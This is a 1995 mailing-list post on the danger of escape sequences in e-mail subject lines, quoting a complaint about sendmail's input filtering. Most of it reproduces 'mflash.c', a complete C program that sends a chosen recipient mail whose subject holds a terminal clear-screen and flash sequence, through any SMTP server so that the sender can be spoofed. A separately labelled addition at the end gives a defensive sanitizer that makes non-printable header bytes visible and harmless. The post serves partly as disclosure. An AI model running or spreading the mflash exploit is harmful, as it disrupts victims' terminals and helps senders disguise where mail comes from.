On Sat, 25 Feb 1995, Dr. Frederick B. Cohen wrote:

> [FLAME ON]
>
> Note that the sendmail implementations have failed repeatedly because
> instead of checks for ALLOWABLE sequences, they have checks for NOT
> ALLOWED characters, and they allow input for one purpose to be used for
> another purpose. Since when do we have email addresses with `|;{(*&'?,
> return and newline in them? For that matter, why should we allow for
> inputs with 8-bit bytes, ^D, ^Z, or other control, meta, or escape
> characters. These are not legitimate email address components and
> should not be permitted for this purpose.

Oh, and has everyone been made aware of the 'newmail' and 'pine' bugs that
allow people to send you escape sequences in the subject line? The program
that is being distributed is called 'mflash.c', but telnetting to the mail
port is easier. If you put a clear-screen sequence as the subject of a
message to yourself, your life will be miserable.

The folks at Pine HQ have said they're not thinking of fixing it at present.
I didn't inquire at Elm HQ (newmail) or even test 'elm' proper for the
problem.

---mflash.c:

/*
   Mail Flash - (C) 1994 CHA0S All Rights Reserved

   This is a simple program which demonstrates the problem with certain
   parts of VT100 emulation. Previously similar programs made use of
   talkd, but a user could stop attempts by simply entering "mesg n".
   This program sends the "flash" string which will really screw over
   a terminal in the SUBJECT header of e-mail. E-Mail readers such as
   pine show you this before you can decide to even delete the mail!

   Support has been added to choose your own SMTP server for neat-o
   hostname spoofing. (krad!)
*/

#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>     /* strlen */
#include <strings.h>    /* bzero, bcopy */
#include <unistd.h>     /* sleep */
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>

void smtp_connect(char *server);

int thesock; /* the socket */

void smtp_connect(char *server)
{
  struct sockaddr_in sin;
  struct hostent *hp;

  hp = gethostbyname(server);
  if (hp==NULL) {
    printf("Unknown host: %s\n",server);
    exit(0);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  thesock = socket(AF_INET, SOCK_STREAM, 0);
  connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
}

void main(int argc, char **argv)
{
  char buf[1024];

  if (argc != 4) {
    printf("usage: mflash smtp_server from to\n");
    exit(0);
  }
  printf("Connecting to SMTP Server %s\n",argv[1]);
  smtp_connect(argv[1]);
  printf("Sending Mail Flash To %s\n",argv[3]);
  /* bounded write so long arguments cannot overrun buf */
  snprintf(buf, sizeof(buf), "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]);
  send(thesock, buf, strlen(buf), 0);
  /* I am not sure how to check when this buffer is done being sent.
     If you are having any problems increase the sleep time below! */
  printf("Sleeping To Make Sure Data Is Sent ...\n");
  sleep(3);
  printf("Done!\n");
}

--
Charles Howes -- chowes@helix.net
Always tell the truth, then you make it the other bloke's problem!
    - Sean Connery, 1971
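
The fix a mail reader needs for the subject-line problem described in this message, written as an added example that is not part of the original post and is not code from Pine, Elm or newmail. It applies the allowlist approach from the quoted text to display: only printable ASCII reaches the terminal, and every other byte is shown in a visible, inert form. The function name and the sample subject are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Copy a header value for display on a terminal. Printable ASCII
 * (0x20..0x7e) passes through; any other byte is written in visible form
 * (^X for control characters, \xNN for 8-bit bytes) so the terminal never
 * interprets it. Returns the number of bytes neutralised, or -1 if out is
 * too small to hold the result. */
int sanitize_for_tty(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    int replaced = 0;

    if (outlen == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char tmp[5] = { (char)*p, '\0' };   /* default: byte is allowed */
        if (*p < 0x20 || *p == 0x7f) {      /* C0 controls and DEL */
            snprintf(tmp, sizeof tmp, "^%c", *p ^ 0x40);
            replaced++;
        } else if (*p > 0x7f) {             /* 8-bit bytes */
            snprintf(tmp, sizeof tmp, "\\x%02x", (unsigned)*p);
            replaced++;
        }
        size_t n = strlen(tmp);
        if (o + n + 1 > outlen)             /* keep room for the NUL */
            return -1;
        memcpy(out + o, tmp, n);
        o += n;
    }
    out[o] = '\0';
    return replaced;
}

int main(void)
{
    /* Constructed sample: a subject carrying a clear-screen sequence. */
    char shown[128];
    int n = sanitize_for_tty("hello\033[2J\033[Hworld", shown, sizeof shown);
    printf("%d byte(s) neutralised: %s\n", n, shown);
    return 0;
}
```

A non-zero return value is also a cheap signal for flagging or logging the message before it is listed in the index.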